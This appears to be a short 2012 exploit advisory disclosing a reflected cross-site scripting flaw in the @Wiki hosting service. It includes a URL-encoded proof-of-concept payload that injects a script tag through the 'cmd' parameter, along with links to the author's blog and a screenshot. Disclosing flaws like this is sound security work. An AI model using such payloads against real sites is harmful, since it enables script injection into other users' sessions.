# Exploit Title: @Wiki Cross Site Scripting
# Date: 16.02.2012
# Author: Sony
# Software Link: http://atwiki.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/wiki-cross-site-scripting.html
..................................................................

@Wiki is a free wiki hosting service.

/ensandbox/?cmd=[our xss is here]

http://www1.atwiki.com/ensandbox/?cmd=%22%3E%3C%225%22%3E%3Cscript%3Ealert%28%22AtWiki%20Cross%20Site%20Scripting%22%29%3C/script%3E

http://3.bp.blogspot.com/-TowopsFBAto/Tz2HZAvvBhI/AAAAAAAAAf0/ibbz1YIRcBQ/s1600/%2540wiki.JPG

..................................................................

InSecurity.Ro

Because we care, we're security aware!